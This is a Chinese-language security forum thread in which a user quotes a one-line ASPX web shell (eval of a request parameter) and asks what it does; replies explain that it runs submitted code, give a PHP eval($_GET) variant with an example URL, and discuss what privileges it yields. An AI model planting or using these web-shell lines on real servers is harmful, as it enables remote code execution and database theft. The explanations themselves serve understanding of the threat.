一句話木馬 - 資安

Table of Contents

在網路上看到這個東東
<%@ Page Language="Jscript" validateRequest="false"
%><%Response.Write(eval(Request.Item["w"],"unsafe"));%>

挺有趣的,有大神可以解釋這一行作用嗎,感謝。

--

All Comments

Caitlin avatarCaitlin2019-05-27
嗯,這句話真長...
Oliver avatarOliver2019-05-28
eval是個可以把接收到的字串轉成code的函式,所以今天這個
程式收到一個Request,可能是get也可能是post吧,傳來了一
Una avatarUna2019-05-29
個變數叫作w,而我們在這個w中可以放入程式碼,然後他就會
Susan avatarSusan2019-06-03
執行,是說仔細看看,這樣應該算是兩句話...
Puput avatarPuput2019-06-05
真正一句話木馬---> eval($_GET('shell'));
Charlotte avatarCharlotte2019-06-07
要執行時像是這樣 foo.com/index.php?shell="echo 'atk';"
Queena avatarQueena2019-06-11
我打了好多字... 我可以轉CyberSecure板嘛?
Joseph avatarJoseph2019-06-14
一句話木馬都可以寫成半本書了 XD
Damian avatarDamian2019-06-16
請教st大 所以這個w算是拿到os的root shell嗎? 也能執
行任何資料庫的撈取?
Hedwig avatarHedwig2019-06-17
嗯,沒意見,應該是可以轉,晚點轉轉
Mason avatarMason2019-06-21
這個w有沒有取得root權限要看被注入木馬的檔案本身的權限
Madame avatarMadame2019-06-26
,一般而言,普通的檔案是不會有root權限的,如果操作正常
...我是有聽說過有不少人沒事就給PHPmyadmin root 然後被
人用這個REC時就Q了XDDD
Kristin avatarKristin2019-06-27
以PHP為例,通常沒有意外的話,一個PHP是可以撈取DB,如果
Linda avatarLinda2019-06-30
沒有特別控管是可以執行任何資料庫的撈取沒錯
Steve avatarSteve2019-07-03
不過專業點的會把DB分段,這時就只能撈有權限的那段了
Carolina Franco avatarCarolina Franco2019-07-07
是說我有些用詞沒有很精確,不要太在意>"<
Hardy avatarHardy2019-07-09
樓上怪怪的.. 該說執行木馬者的執行權限吧?
Gary avatarGary2019-07-09
雖然備注入木馬的.php是ooxx:ooxx但如果apache是root執行,
還是會拿到root權限.. 同樣的, 如果從mysql執行系統指令,
看的就是mysql的服務是誰啟動的, 如果用appserv, 全部跑
Ida avatarIda2019-07-10
administrator當然就... ((請自行想像..
Bethany avatarBethany2019-07-15
然後樓上提到拿到一句話的權限是否能不能撈DB..
如果DB另外有設密碼, 就要另外破密碼..
Andrew avatarAndrew2019-07-17
回文好了..
Bennie avatarBennie2019-07-17
嗯,對啊,所以我說我說的不精確